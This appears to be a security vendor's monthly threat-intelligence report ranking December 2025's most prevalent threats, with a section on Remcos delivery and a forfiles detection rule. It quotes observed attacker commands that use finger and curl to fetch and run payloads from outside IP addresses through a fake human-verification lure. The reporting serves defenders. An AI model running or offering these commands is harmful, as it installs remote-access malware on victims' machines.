Highlights from December
JustAskJacky, a family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background, remained in first on our top 10 most prevalent threat list for the third month running. That said, the overall volume of JustAskJacky that we’ve seen has dropped considerably in those months; December activity was one fifth the volume we observed in October 2025. At Red Canary we track the whole family of tools under the name JustAskJacky, but we’ve seen more than a dozen different lure names including AllManualsReader, AskBettyHow, ManualReaderPro, OpenMyManual, and others.
In a tie for third this month is Atomic Stealer, an information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. Atomic Stealer has been in the top 10 list for the last five months, and jumped into third after tying for seventh in December 2025.
Scarlet Goldfinch shared the tie for third, which is the highest Scarlet Goldfinch has ranked on our list since June 2025. Also known as FakeSG, Scarlet Goldfinch is Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. In December, as in most of 2025, we saw Scarlet Goldfinch leverage paste and run as an initial execution technique to deliver its payloads.
Both of Scarlet Goldfinch’s December 2025 payloads made the top 10 list this month, tied for eighth:
- NetSupport Manager, a legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access. NetSupport Manager dropped from fourth place last month, in part due to Scarlet Goldfinch also delivering Remcos (see below) in some instances.
- Remcos, a legitimate closed-source tool marketed as remote control and surveillance software, often used to gain persistent remote access to systems, made its debut on the top 10 list. You can learn more about Remcos below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for December 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⮕ 1 | Threat name: | Threat description : Family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background |
| Month's rank: ⬆ 2 | Threat name: | Threat description : Red Canary's name for a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities |
| Month's rank: ⬆ 3* | Threat name: | Threat description : Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 3* | Threat name: | Threat description : Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code |
| Month's rank: ⬇ 5 | Threat name: | Threat description : ConnectWise product that administrators and adversaries alike use to remotely access and manage devices |
| Month's rank: ⬆ 6* | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Month's rank: ⬆ 6* | Threat name: | Threat description : Traffic distribution system, first observed in 2024, that uses compromised WordPress sites to deploy malicious code that may lead to malware families such as Rhysida and Interlock ransomware, D3F@ck Loader, Mocha Manakin, Mintsloader, and WARMCOOKIE |
| Month's rank: ⬆ 8* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Month's rank: ⬇ 8* | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 8* | Threat name: | Threat description : Legitimate closed-source tool marketed as remote control and surveillance software, often used to gain persistent remote access to systems |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Rogue RMM: Remcos’s rise
Remcos may be new to the top 10, but it is not new to Red Canary or to defenders. While it’s ostensibly a legitimate RMM tool developed by the company Breaking Security, multiple adversaries have used Remcos since its inception to gain persistent remote access to systems. Remcos first emerged in 2016 as a purchasable service on hacking forums. A free version is available that includes basic remote administration capabilities; additional features like keylogging, camera and microphone access, and additional stealth options are available for purchase.
Remcos made its way into the December top 10 by becoming a Scarlet Goldfinch payload. In some cases we saw NetSupport delivered alongside Remcos, and in others Remcos was the only payload we observed. It may be that the activity cluster is testing new tools to supplement or possibly replace its longstanding use of NetSupport Manager for remote access. The activity we observed in December began with successful paste-and-run lure execution, a technique that Scarlet Goldfinch has been using since April 2025. One interesting change in December was the use of finger in commands, like in this example we saw:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" Start-Process cmd -ArgumentList '/c finger Galo@91.193.19[.]108 | cmd' -WindowStyle Hidden; ' Verify you are human--press ENTER '
This command leverages the TCPIP Finger Command to execute a remotely hosted payload at 91.193.19[.]108—in this example the payload was NetSupport Manager. Successful execution of the command led to curl downloading an archive file with a misleading PDF extension. The contents of the file were extracted using tar -xf, introducing a malicious Remcos DLL and a legitimate EXE vulnerable to DLL sideloading onto the endpoint. Here’s an example of a command we saw in late December 2025:
powershell.exe -NoProfile -Command "$rand = 458721; $data = \"C:\Users\username\AppData\Local\"; $ZXJQLMPTVRAYWGUK = Join-Path $data $rand; curl -s -L -o \"$ZXJQLMPTVRAYWGUK.pdf\" 79.141.172[.]212/tcp; mkdir \"$ZXJQLMPTVRAYWGUK\"; tar -xf \"$ZXJQLMPTVRAYWGUK.pdf\" -C \"$ZXJQLMPTVRAYWGUK\"; $exePath = \"$ZXJQLMPTVRAYWGUK\intelbq.exe\"; Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = \"`\"$exePath`\"\"}; "
Adversaries often attempt to obfuscate Remcos’s code and/or inject it into other processes to try and evade endpoint security solutions, since most products have become proficient at detecting its execution and it doesn’t have the same kind of widespread accepted use as NetSupport Manager. In one example we saw, the legitimate EXE used was nearby_share.exe, a legitimate Quick Share binary, with Remcos subsequently running via DLL sideload.
If allowed to continue, follow-on activity can include downloading additional payloads and system and domain reconnaissance.
At the time of publication, third-party researchers reported synchronous campaigns delivering Remcos, indicating that its popularity as a payload may be trending upward. Historically, Remcos is also a popular payload for tax-themed phishing campaigns at the beginning of the year. Fortunately for defenders, Remcos requires an initial access and delivery vehicle of some kind. In December 2025, we observed adversaries leveraging the forfiles LOLBAS to execute commands and reach out to remote resources early in the execution chain. That gives us a detection opportunity.
Detection opportunity: The Windows utility forfiles using command-line options consistent with indirect execution, including /p path, /m searchmask, /c and a command to execute
The following pseudo detection analytic identifies forfiles using command-line options consistent with indirect execution, including /p path, /m searchmask, /c and a command to execute. This combination of switches does not normally occur, and can be used to execute malicious commands or proxy execution to a different binary, like we observed with Remcos delivery in December 2025. We recommend you exclude command-line patterns found in legitimate administrative use in your environment, to reduce noise.
process== (forfiles)
&&
command_includes (/c, -c)
&&
command_includes (/p, -p)
&&
command_includes (/m, -m)
&&
command_does_not_include (*)
Note: * is a placeholder for legitimate forfiles command line strings in your environment